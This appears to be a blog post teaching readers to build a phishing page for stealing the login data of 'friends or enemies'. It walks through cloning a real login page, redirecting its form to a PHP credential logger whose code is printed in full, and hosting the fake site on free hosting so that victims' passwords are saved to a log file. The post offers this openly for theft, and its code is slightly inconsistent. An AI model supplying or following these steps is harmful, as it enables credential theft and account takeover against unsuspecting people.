How to Create Phishing websites???

Hello friends 👋

I'm here to show you how to make phishing sites for 🤫 Hacking or Stealing some Useful Data of your friend or enemy's.🤫👽

Phishing is the technique to create a similar type of web page to the existing web page.

So let's Start here you can follow the following Steps.....🤫🤫


  • Go to your desire website login page and press Ctrl+U or find source code by clicking           on  developers tools and find source code of the page.
  • Copy the Code and paste it in notepad and edit it as you desire to look well familiar to           that website.🧐🧐
  • Find action method in the code of html by manually or search "action" to find it. 
  • Replace action filed by "post.php".
  • It's looks like <...... action=post.php...>
  • goog_594602874Create a php file or copy the code given below.
  •  So, here’s the php script.

    <?php
    header(“Location: https://www.facebook.com”);
    $handle = fopen(“logs.txt”, “a”);
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);

    fwrite($handle, “=”);
    fwrite($handle, $value);
    fwrite($handle, “\r\n”);
    }
    fwrite($handle, “\r\n”);
    fclose($handle);
    exit;
    ?>

    Just copy this script and paste it down to your notepad file and then save this file with a name post.php  

    Hosting the PHP File for Password Storing:

    Now here is the juicy part, making your fake website online so other people can browse it.

    You can use any free hosting services to host and store passwords. However, the hosting plan has to include something called "FTP". For this tutorial, I will be using 000webhost.

    Navigate to the FTP Server for Your Web Hosting Service:

    For this step, I assume that you have already created a website with your hosting service.

    For 000webhost, you simply click on "File manager" and click "Upload Files". Here is a picture of the FTP server for 000webhost:

     🤭🤭🤭🤫🤫🤫👽👽👽


    The Victim login credentials save in log.txt file.

    Thanks for Reading my blog. Hope you find something best 😘😊.


    Comments

    Popular posts from this blog

    Hack Android with Infect Virus Installation and Usees

    Hack Pubg account with termux in Android phone

    Cascading Style Sheet (CSS) Injection